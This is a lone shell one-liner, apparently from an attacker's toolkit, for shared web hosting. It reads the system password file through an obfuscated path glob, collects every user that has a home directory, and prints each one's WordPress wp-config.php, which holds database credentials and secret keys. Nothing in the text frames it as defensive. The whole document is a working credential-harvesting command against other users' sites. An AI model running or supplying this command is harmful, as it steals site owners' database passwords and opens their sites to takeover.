for i in `cat /et?/passwd |grep /home |cut -d":" -f1` ; do eval "cat /home/$i/public_html/wp-config.php";done;